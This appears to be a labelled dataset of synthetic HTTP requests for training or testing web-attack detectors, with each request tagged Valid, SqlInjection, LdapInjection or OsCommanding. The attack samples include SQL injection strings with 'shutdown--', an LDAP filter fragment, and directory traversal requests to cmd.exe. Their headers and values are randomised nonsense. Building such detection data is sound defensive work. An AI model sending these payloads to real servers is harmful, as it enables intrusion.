GET /iclmateodat.tiff?wsmtei3non=088&eadd=18&oaptl=ls%3Asu&mpssSedek7c=xi&fz64tkie9=m3zno&tlooNeD0Velacou=eNR6CWkMkF3i&evcotcoq=41&rerrpOs=0ark%5C&glhceDh=mLtEnd+6Aeoo+varD&ri2sNefsoosZxlT=beo HTTP/1.0
Host: 10.172.107.183
Connection: ipebEg
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: gzip, compress
Accept-Language: l-8a;q=0.7, ed-uoow
Cache-Control: no-transform
Client-ip: 227.21.129.166
Cookie: F94r9Qyetcw=gwtAs9in;sr1ae=on;jequensfot7=sny/&;etntKiftd=lsuhq;xtpb48binhltont=pOr8rH;cmo= 
Cookie2: $Version="20"
Date: Mon, 28 Jan 08 15:30:22 CET
ETag: "ja7JX40J4YiRO32m"
Expect: 100-continue
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Sun, 16 Dec 07 22:11:27 GMT
If-Unmodified-Since: Sun, 23 Aug 09 15:22:18 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Aug 07 09:52:02 UTC
Max-Forwards: 64
MIME-Version: 3.7
Pragma: luorsao='StSi'
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: Basic ZG9kdGM6dGRzZTZzYQ==
Range: 9-,78403-
Referer: /tchnde.aspx
TE: deflate;q=0.9
Trailer: Date
User-Agent: stRa/6.3.3.7
UA-CPU: MIPS
UA-Disp: 833,846,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 630x5808
Via: mNyeE/7.1 171.130.176.37
Transfer-Encoding: compress
Upgrade: ia1c/2.8, mur/1.2, susnSi/2.8, tteid/2.7, nnese/5.9
Warning: 062 www.uhaba3n.jpg:624 "jrE8wfEoytuir6bfae3o" "Tue, 24 Jan 06 06:41:06 CET"
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 3895037364589724
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11977
Start - Id: 33128
class: Valid
PUT /r@XJ8ZBR5/iss/binbV/4j-MJBwiCx0iq8OhFPG/aOK92At_C@wq7f7qO2/retruvn0t/wM092rm_o5mx4k_h8.asp? HTTP/1.1
Content-Length: 13
Content-Language: aemtaeu,dmilet
Content-Encoding: compress
Content-Location: /e4s8t8et.txt
Content-MD5: dHJhbHdXY3BoZW9UdGljcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jan 08 10:27:56 GMT
Last-Modified: Wed, 05 Sep 07 04:46:27 UTC
Host: www.Nhdl.cz
Connection: close
Accept: image/jpeg, application/zip;q=0.6
Accept-Charset: windows-1258;q=0.1
Accept-Encoding: *
Accept-Language: 7tg-ARg1he, a-rht;q=0.7, cscn-f6awio;q=0.4, p-euonE;q=0.4
Cache-Control: max-stale
Client-ip: 230.124.221.154
Cookie: nwmtqe=Itatah ldtnaicj;yhwfej=linkybing2;gohmj7Idtcieg=inr rio
Cookie2: $Version="24"
Date: Tue, 22 May 07 24:47:58 UTC
ETag: "FuhKu4sJi4zJ5TTZcB@"
Expect: fxc03c9
From: lcteseg@iehlhresle.uk
If-Modified-Since: Fri, 10 Jul 09 13:43:35 GMT
If-Unmodified-Since: Thu, 29 Mar 07 03:31:23 UTC
If-Match: "Szvqlo@ZYsqKHiUjaVQA"
If-None-Match: "tu6NEV39TO51XpuUK"
If-Range: Sun, 22 May 05 09:48:22 GMT
Max-Forwards: 7023
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic N3RhN3JuOnVkbW5zZA==
Authorization: Digest opaque="d3Nact"
Range: -787,80891-464,53849-
Referer: http://cmen.net/hbbvee/scole2k/lreaea/ewryDq/shana.pl
TE: chunked;q=0.9,trailers
Trailer: Range
User-Agent: tae7god/4.0.9.5.2
UA-CPU: MIPS
UA-Disp: 035,199,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6581x441
Via: 6.1 www.osmnsW.shtml:746, 6.3 www.hiean.jpeg, nneesr/6.5 www.siut.png
Transfer-Encoding: compress
Upgrade: i1oE/1.8, htoee/2.9, lnsedh/9.7, rNtlnM/5.3
Warning: 903 www.rzea4yr.htm "r5iGesaOlmea2osamrqa" "Tue, 10 Feb 04 12:04:44 GMT"
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

mg=%xmlsimg

End - Id: 33128
Start - Id: 41572
class: SqlInjection
GET /nbe09/i.b2/MBperl0aWygePwherelocation9F/pa6oen9hses/tEUfvtBZrVfM1gPy5t92/gV5KRvnujiAwe/aAwv/4oahi4cyytrtE5dmce.mdb?yhbtcosx=e1sa+mochah%3Ae8t5i&0mt=%27%3B+++++shutdown--&aaugaotahrz=io%24&clmatea6te=111 HTTP/1.1
Host: www.tLvdbeuR.fr
Connection: wOafsi
Accept: */*;q=0.3
Accept-Charset: koi8-r;q=0.1, x-mac-cyrillic;q=0.3, cp-936, x-mac-turkish
Accept-Encoding: *
Accept-Language: s1m-8se, nto-bwtsa;q=0.1, p-uif;q=0.5, mz-yfflaTlj;q=0.4
Cache-Control: max-age=94
Client-ip: 237.68.176.239
Cookie: tihtncwetet=746;hecjm2ttaeSe=06t;ysoagr=ca+U emevalt;Jtao= &;LZBX1i.VRC=iOiassh;TUOVsXDRb=]aasbkntomfrom9fnsyosk
Cookie2: $Version="950"
Date: Mon, 17 Dec 07 22:39:00 GMT
ETag: "Mjovsj8NklqegQiwJGfc"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Wed, 13 Dec 06 22:51:25 GMT
If-Match: "D99.tO_aZFAN9RHejF"
If-None-Match: "hWceBVZBcyHem7PY4"
If-Range: Wed, 09 Apr 08 01:36:02 GMT
Max-Forwards: 55
MIME-Version: 7.8
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: ytkd2f r9ns9e=yODl
Range: 629953-,-3
Referer: /ireihn/aitaunie/lTih13c/VSede.mpeg
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: oaqns1ogw
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/2.9 www.uwip.gif, 3.0 169.72.154.142:51532, 0.2 42.201.7.214:312
Transfer-Encoding: gzip
Upgrade: Epoll/4.7, sesde/6.4, Uar/2.7, i4she/5.4, mukl/7.2
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41572
Start - Id: 34908
class: Valid
POST /ls2CJ_tAmpLjgXx.js? HTTP/1.0
Content-Length: 157
Content-Language: 0sni51,nOermR
Content-Encoding: identity
Content-Location: /eoteae/Nstco6u/CmSeiv/onreNS.dll
Content-MD5: Y21leHRpYmRmenRmdGVvbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Oct 09 17:27:07 GMT
Last-Modified: Mon, 05 Mar 07 06:09:45 CET
Host: www.lrsxeafw.net:4
Connection: ltdu
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic;q=0.2, iso-8859-8-i, iso-8859-7;q=0.0
Accept-Encoding: *
Accept-Language: r9tnsi-o8erEBs;q=0.7, trlsnyvt-Ty;q=0.6
Cache-Control: n=vetr
Client-ip: 235.153.188.146
Cookie: 3SSJb=t;eerase=Uudlhssnj;lqhOMhaaguoios=1
Cookie2: $Version="3"
Date: Sat, 22 Aug 09 09:59:52 UTC
ETag: W/"2ZGVZ7-h9APwrNSm"
Expect: 100-continue
From: e6th@heetaerCl7.cz
If-Modified-Since: Sun, 06 Jan 08 11:47:40 GMT
If-Unmodified-Since: Fri, 18 Jan 08 17:07:56 GMT
If-Match: "KrQtnrfnHxLg9lrF.J"
If-None-Match: "JcFvQrH5XhVPD87RlHwM"
If-Range: Thu, 02 Mar 06 21:49:02 GMT
Max-Forwards: 6989
MIME-Version: 7.0
Pragma: edw0w=rsganNke
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Digest qop=peetd
Range: 068382-
Referer: /o2irm/krdhl/idos/nataMWns.css
TE: deflate
Trailer: Accept-Charset
User-Agent: i9e9om8 http://www.e1uas.uk
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: FTP/2.6 www.Ibta9h.gif:937, HTTP/2.9 www.erhhesp.html:494
Transfer-Encoding: bUltE
Upgrade: dpoRne/8.4, htoozh/1.3
Warning: 174 www.snstmg.html "xe7drtt7wbsgoteohu" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 5563045665
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bo=iRaettsohfnhnz7giO&8gSzezt=l3|rj&FzRCdRIeT=home<sLt&estad=r&uKWD4Kj=hsEase=z 9Rm@ts7|sock_streamci&rtfRt1oda0fs=fofcDoXv&eiitoenwee6bu=anwlTozJ 

End - Id: 34908
Start - Id: 36893
class: LdapInjection
GET /ussfptam1EoethbEu/flaO08S6MTn/4smiryhl5tiNte/eqPnvjYXN9zPCAX/bXfOPkv/9iEiAgcd/Tpz/nullDGE/HYFLD7echo/XpZWD@ZcyEzW/optTN/KformmailNreplacepz.asmx?tH4nSbR=eTprocessing-instructionnullt%2Bti%3Fgp+%7C&nytase4a=a_F5eKT.u0t5&i1Sewnaoeu=58&raUvnat=215a4c HTTP/1.0
Host: 54.227.64.215:65
Connection: umwn
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=26
Cookie: icrc=so2)(   |   (ni=*);wRzXKB3wa=fltnhnchnTleZa;ikhUf=ee ietu node zu3;z4tetgyb3c=m0lhuienA3healsIA;olaor3e=[t;2y=r jaegbgsoundex& on$a+
Cookie2: $Version="7"
Date: Mon, 22 Nov 04 04:51:46 GMT
ETag: W/"SlG8CxVjDmKFv3p"
Expect: 100-continue
If-Modified-Since: Mon, 31 Mar 08 09:17:50 GMT
If-Unmodified-Since: Thu, 18 Nov 04 13:30:52 UTC
If-Match: *
If-None-Match: "qBJiuu3CaPD4oSkp"
If-Range: Wed, 12 Mar 08 18:36:52 GMT
Max-Forwards: 9
MIME-Version: 4.3
Pragma: no-cache
Authorization: NTLM MGNyYVR0U2NvYmU4djdhdXV0aW1wbHI4Yzd4ZW1pZVR0ZHhzaXRzZWxoZW9u
Range: 21-,-16,9678-
Referer: http://www.tymqbmo.cz/aTcq/Sdwo/duPrs/eita6h5.sh
TE: gzip;q=0.5,gzip,chunked
Trailer: If-Match
User-Agent: ojzSbV2NbF http://www.dpit.be
UA-CPU: Sparc
UA-Color: color32
UA-Pixels: 8595x744
Via: HTTP/3.7 210.251.141.213:295, hht/3.5 www.O1Eou.css, 3nae/0.8 175.37.170.243
Transfer-Encoding: gzip
Warning: 741 www.mfst.htm "eeuaurentse2" "Wed, 25 Jul 07 20:34:34 GMT"
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36893
Start - Id: 16153
class: Valid
GET /a0as.php4? HTTP/1.1
Host: 200.84.58.47
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=7
Client-ip: 163.65.92.102
Cookie: a0=vh;pEzLyulh=i.6G3ETS5;2otterhphl=gxp_@/r
Cookie2: $Version="550"
Date: Thu, 20 Oct 05 08:04:47 GMT
ETag: W/"5GqYSV1L-MHzvD_"
Expect: dasaoNn
From: nt6y@jrn3wp.st
If-Modified-Since: Fri, 13 Jul 07 11:26:59 CET
If-Unmodified-Since: Mon, 29 Aug 05 08:17:11 GMT
If-Match: *
If-None-Match: "TtWDawbD17gVEiQ.e6"
If-Range: Wed, 19 Sep 07 09:16:15 GMT
Max-Forwards: 771
MIME-Version: 9.3
Pragma: iya68r='if'
Proxy-Authorization: sphtg rtywtf=ahe28
Authorization: Basic YmVydGRhOmFibXh0c2Fo
Range: -6,88514-
Referer: http://www.e4crt.biz/wuIoe.cfm
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.1 (compatible; httkEims; Linux i586; eSst; zgeel)
UA-CPU: StrongARM
UA-Disp: 6343,6602,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 846x8936
Via: HTTP/5.0 49.180.186.178, 9.5 www.torzma.htm, HTTP/9.5 www.et8esD.js
Transfer-Encoding: hwhhba; hrpo9=watnuz
Upgrade: c7s/6.3, sdds/1.7, hGed/6.3, sda/9.3
Warning: 974 167.121.41.130 "gczrblTleio" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 170443509058668191
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 16153
Start - Id: 33545
class: Valid
POST /sp3frnowOmdcaes/FFyiF-RR2L0tY/w19rX9lZ0uo/nJ2JdyxoCV/tQ7.html? HTTP/1.0
Content-Length: 99
Content-Language: 5
Content-Encoding: identity
Content-Location: http://www.eevgdncs.it/eomxiak/9x4pwEgg/lrerHpm/do0eb.mdb
Content-MD5: b3VlM2g0ZUVJbHRvbnRtcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Dec 04 19:16:02 UTC
Last-Modified: Thu, 12 Mar 09 04:57:09 GMT
Host: www.6tati.net
Connection: a1haRa
Accept: audio/*
Accept-Charset: x-mac-japanese;q=0.2, windows-874, gb2312;q=0.9, windows-874;q=0.7, euc-cn
Accept-Encoding: identity;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 159.30.34.225
Cookie: srpiuee1p1fui=tlt;sla0dnmo=ch
Cookie2: $Version="7"
Date: Thu, 04 Oct 07 11:28:43 GMT
ETag: W/"yhDWUMHaDowHay_"
Expect: pIiwet
From: esu6@t5cEi.st
If-Modified-Since: Tue, 18 Jan 05 02:43:06 GMT
If-Unmodified-Since: Thu, 09 Jun 05 17:13:25 UTC
If-Match: *
If-None-Match: "cP7YehinvaTjkPs7H7J"
If-Range: "...uF7cyy8.OlU8bjM7"
Max-Forwards: 23
MIME-Version: 2.1
Pragma: i8lbelG=e
Proxy-Authorization: iegu ssseMwrr=mwsot
Authorization: 5s4u saihe=1laaoe
Range: -842
Referer: http://oneeiP.ch/nrnn/heH2e/ohtw/h0ao.tar
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 2.8; ro-tr; rv:8.5.6) Gecko/65645655
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 417x756
Via: 1.9 223.220.5.154, FTP/2.0 193.228.52.168:69102, 7.9 150.86.151.218
Transfer-Encoding: ts0eh
Upgrade: ISrcs/4.9, Gqo/4.9, rzorSu/0.2, remnis/8.6, ulste1/0.7
Warning: 636 www.asse.html "nsluyu6imh" "Fri, 28 Jul 06 18:49:46 GMT"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 40780831538303970889
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

stdeacbRnax=6Bw_vp&TShttpsUsgSEKDp5=4nsNreeshieckavonh&ittytdTXFh=ls7b%io0Iservicesesi\9winntus

End - Id: 33545
Start - Id: 31475
class: Valid
GET /tw/dSlLsanrpme/t-/FO/rB7kJ/tviotCnMhgh1/a8lpnZ7BSIrZbAJNAcJ/uo5rmftapXcl/y5VWa0E./uhI7catQSVM_processing-instructionm6H/qlYw5zuvF8DIV/tzg.php4?htq=schildersedpd0i&ai3ohq9=ic&agcsordgiilzmh=yttb3elausOt3a&_d8DAX-NBwZ=5d1vrjNLU-&geeNSiiEn=4633784&au=99&ztoHsO=683337943&RmcseQbtWnfhr=cane&ivsgrdharf3eE0=gLOs26tpgr HTTP/1.1
Host: 59.186.144.116
Connection: uw5nf
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: ett-odcku;q=0.6, oohahag-iiet, ir-0fco, es-Cne5tn;q=0.1, 2pe-rNEemrim
Cache-Control: no-store
Client-ip: 242.224.6.251
Cookie: HlYb=tgoxs7eMtdtacl1er;fsuhsedDdzonAo=rtmpd;lsedPdmtn=tde;eylBoIi=iqrpgXp8-F;lln=9487;NVe=04606
Cookie2: $Version="9"
Date: Mon, 14 Jul 08 10:50:31 UTC
ETag: W/"Su3RQY5V9oUbYfHpKM5F"
Expect: 7rclau
From: gdf9c@jueelrawg9.de
If-Modified-Since: Fri, 03 Dec 04 22:29:22 CET
If-Unmodified-Since: Fri, 16 Mar 07 03:35:33 GMT
If-Match: "yIbBk77i4-50qX@Z6N3"
If-None-Match: "5_QIxu-_zTemPeqNnvb"
If-Range: Mon, 17 Dec 07 18:03:38 CET
Max-Forwards: 9
MIME-Version: 7.4
Pragma: spaehea='xtdlmt'
Proxy-Authorization: Digest nc=Dbc2bcCc
Authorization: iaeas aloee=titihdaa
Range: -6057,5960-2,-26499
Referer: http://www.nl1fj.de/griN.css
TE: trailers
Trailer: Connection
User-Agent: Mozilla/7.6 (compatible; Konqueror/8.3; Open BSD i386; 6nhoI)
UA-CPU: Sparc
UA-Disp: 4970,305,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: 2.0 www.lwoceuhh.tiff
Transfer-Encoding: Sczz
Upgrade: nru/5.8, ett/0.4, tbh9/3.1
Warning: 334 186.45.95.188:492 "4a7905aupt5ae" "Thu, 09 Aug 07 05:54:53 GMT"
X-Forwarded-For: 176.134.48.18
X-Serial-Number: 1337403720563308
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31475
Start - Id: 36617
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.hsjo8tT.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.8, deflate;q=0.7, identity
Accept-Language: fmd-g;q=0.6, 9-eel, o-Xa0Tt, nhv5K-5ms;q=0.4
Cache-Control: no-cache
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="2"
Date: Sat, 07 Feb 04 17:57:23 CET
ETag: "19NZywTcR7rRSt-Yo"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Mon, 04 Jan 10 03:04:48 CET
If-Unmodified-Since: Fri, 03 Nov 06 11:51:22 UTC
If-Match: *
If-None-Match: *
If-Range: "Hy7Yen2Nw_C8liEHvP"
Max-Forwards: 06
MIME-Version: 1.9
Pragma: o='Ui'
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest nc=aeCb2501
Range: 8050-
Referer: http://9hoeSus.biz/9euegtn/wpas/roresE/efoo.pdf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: aAuq4/2.8.6
UA-CPU: MIPS
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 www.a1tuteos.gif, FTP/8.5 167.177.49.173:44, 8.0 www.rctpen3.htm
Transfer-Encoding: deflate
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36617
Start - Id: 41944
class: SqlInjection
GET /arTirm.GqDg/tbrf5hxfbaHW2qPnE/yTPJ9t4feado/honaeNne4Eg7rYnru13d/oc/3A/z4BIq5JIbMat8s@MJiG/yhxs/oU2Mm/Lt7b_-GisdJpassthru_XY.nsf?2atreh=%27select+customer_phone+++%27%7C%7C%27from+++++customers++%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++++and++customer_type%3D1%27%3B HTTP/1.0
Host: www.ac1n.biz:80
Connection: keep-alive
Accept: image/jpeg;q=0.1, text/plain
Accept-Charset: iso-10646-ucs-2;q=0.4, iso-8859-1, utf-8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 148.203.206.38
Cookie: 6mrmSri=libmyeUo2tl3n=whereqhobjectm
Cookie2: $Version="8"
Date: Sat, 12 Jul 08 06:02:47 CET
ETag: "STLwztEysXjjA5_mC8"
Expect: 100-continue
From: erpnsemv@5tAwdogn.st
If-Modified-Since: Tue, 13 Mar 07 17:49:21 GMT
If-Unmodified-Since: Tue, 08 Apr 08 12:28:05 CET
If-Match: *
If-None-Match: "a6syYAo@f@MyVGOg"
If-Range: Wed, 13 May 09 24:35:46 CET
Max-Forwards: 8569
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: Basic b2VkYWk6bzhhc3NoZ3M=
Range: 55660-
Referer: /emip/eiii.htm
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.8 (X11; U; Solaris 2.1; ec-zE; rv:2.8.4) Gecko/99195085
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x2725
Via: 3.6 www.tgEj.jpg, FTP/5.6 www.obacro2e.tiff
Transfer-Encoding: gzip
Upgrade: imn/2.9
Warning: 021 www.mcyot.gif "hrtenvrrnpri" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41944
Start - Id: 36562
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.odaerfkye.fr
Connection: ehj6t
Accept: */*
Accept-Charset: iso-8859-5;q=0.7, euc-kr;q=0.0, cp-950;q=0.5, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=17
Client-ip: 199.190.231.15
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="910"
Date: Sat, 16 Oct 04 06:14:02 CET
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: osNAoh@aHn2nry.de
If-Modified-Since: Sat, 11 Sep 04 21:16:21 GMT
If-Unmodified-Since: Fri, 26 Aug 05 23:49:43 UTC
If-Match: "p1IY0hBynYBC.mNb"
If-None-Match: *
If-Range: *
Max-Forwards: 9350
MIME-Version: 4.8
Pragma: eishu=nEn
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: NTLM bmdpdWx0bGdlZ3R3bzlzc0Vsb2Vhd3E0dXNvZ3dpdWhvZ2F1b3hlYnBTdmk0aTU=
Range: -961935,910376-
Referer: http://www.on8hI.org/xzrnut/wbviho.jpg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 8.4; 1a-oa; rv:7.2.4) Gecko/11469429
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: HTTP/2.9 186.100.131.110
Transfer-Encoding: identity
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36562
Start - Id: 33636
class: Valid
PUT /uu/rkIuBJsg.D/h31crfctcehytu/snAkMCkjWs-x5CZcz8/LID3BA7/scohwdt3uygnrl/oUVNEiT24-ZDEpFCKMw/o7lmaeif7iewehhZs.nsf? HTTP/1.0
Content-Length: 283
Content-Language: 1u
Content-Encoding: compress
Content-Location: /rcoq2op.jsp
Content-MD5: cm90dGVvc2VkclR0bHNyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jun 08 03:10:13 GMT
Last-Modified: Sun, 30 Nov 08 22:32:55 GMT
Host: 96.152.103.225
Connection: nfeOtvd5
Accept: */*;q=0.7
Accept-Charset: x-mac-icelandic;q=0.2, cp-932;q=0.1, x-mac-greek, x-mac-hebrew
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: min-fresh=06
Client-ip: 75.116.126.71
Cookie: df4O=79115;eeeitxpeoEin7w=aJhh;iirthnetsEgs=nP9
Cookie2: $Version="81"
Date: Fri, 31 Oct 08 20:40:51 UTC
ETag: "kmSUcPJ2-I1qWCt"
Expect: 100-continue
From: sorto@ieishbt.net
If-Modified-Since: Fri, 27 Jun 08 15:36:31 GMT
If-Unmodified-Since: Thu, 15 Jul 04 17:41:21 UTC
If-Match: *
If-None-Match: "GdIXFknONzB6U3bKh5x"
If-Range: Sun, 19 Nov 06 04:46:06 GMT
Max-Forwards: 845
MIME-Version: 5.5
Pragma: ow1a='S'
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM dGRpZUV0ZHNFcmZtZWlpbmduZWQzb25vYmRlY2Ric2pvY2Zwc294ckFjcGllaA==
Range: 689688-61042,8281-8,59457-
Referer: /adWsyt.cgi
TE: chunked
Trailer: If-Match
User-Agent: ssb7LmHU0X http://www.rttdbes.cz
UA-CPU: PowerPC
UA-Disp: 2341,003,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 298x670
Via: 7.2 www.aeeeus.jpeg
Transfer-Encoding: compress
Upgrade: gtna/7.9, sn70/6.7
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 310133590231890475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

eftagsrothT=8nNeeRpuvATlrdni&Dr=131191&qtzddaewaohmoee=g o[ktr&zitbrl7tnaaw5eI=18229&.-77ktpiEG_-=syrG&iisbe4izefeuf=fwy0&selectZfm8HrihS=p 9&AtVfnhnnoed8=92&yar6tdgc9ret5o=am&dqpuee8I=eewuenU&_vyCzx=e eap&sadts0haa=eYHH@v414&evpanooprhep4a=ehrmheiohaeE2&viperllBnph-D=f&_YBJ=nrD

End - Id: 33636
Start - Id: 26665
class: Valid
GET /h3tdSzPGQ6/xisaTn0.sh?fetarOi=yzt&dhlcewn=5&ntfgewcsiiorV1=Tun8y&wy-Hd=24etden&aTr=3winnt&gno37oihdq=NiotdtaEZa%29echa+ssat&nesAT=sfn%40&processing-instructionW0u_djpk=ede&-mvEOOh=sl+&cI8fgeLhvrpl=53964817&NoOrfpul=2884378659&ium0ru4oepdiGs=6idgyitlae5ufauifo&enissoqt60si=hKR&sChbtet=%5Dhttps&8ioTtoUidio9=eosvt2o3f HTTP/1.1
Host: 155.41.26.72:40987
Connection: 7ItSsn
Accept: text/*;q=0.6, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 86.98.199.239
Cookie: snni4Ol=470
Cookie2: $Version="9"
Date: Mon, 16 Jun 08 12:54:06 CET
ETag: W/"sCWd9J6@y1dr6qNtBNG"
Expect: eetKr7E
From: aenrotes@hoereselr.be
If-Modified-Since: Thu, 22 Jan 04 23:07:42 CET
If-Unmodified-Since: Wed, 16 Mar 05 22:21:15 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 06 Oct 07 04:50:01 GMT
Max-Forwards: 9127
MIME-Version: 0.7
Pragma: ilnnedU='hl6hv'
Proxy-Authorization: iugTi esltl=eshcd
Authorization: irth6 nkmq=ieeroN
Range: -484069,7417-956,-660654
Referer: http://www.Etmie.com/u3a26/iEJsog/einnnnl/ruuNeds.aspx
TE: trailers,deflate;q=0.6,deflate;q=0.1
Trailer: Accept-Charset
User-Agent: hn9mbrier
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 190x433
Via: HTTP/9.9 www.ros0iuh.png
Transfer-Encoding: identity
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 058 www.gTe3ma.tiff:223 "ehdvahokotprEVOlit" "Thu, 15 Mar 07 17:46:33 GMT"
X-Forwarded-For: 132.186.232.188
X-Serial-Number: 210714537840
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26665
Start - Id: 17457
class: Valid
GET /arKOLZfKvxHJB/snoo0secae6bo/ewUl6NV4r.php4?o64o6=xml&eqnpvxB8mwNxM=+m8tflmehchildeetcsam&eig=x_nY5PnvdY%40J&htoihobsOs=oo8y&rtihoa=06613061&j9hGI_2smexec=6133&walpsedvE=nheolc8tf1te&onEiLeobOn=aa%3Ftryburhwp-st HTTP/1.0
Host: www.biTrSo.biz
Connection: keep-alive
Accept: application/x-tar;q=0.3, video/*;q=0.1, image/png;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 141.4.227.36
Cookie: wEryoa5he=xEJ.
Cookie2: $Version="950"
Date: Tue, 02 Jun 09 23:21:27 UTC
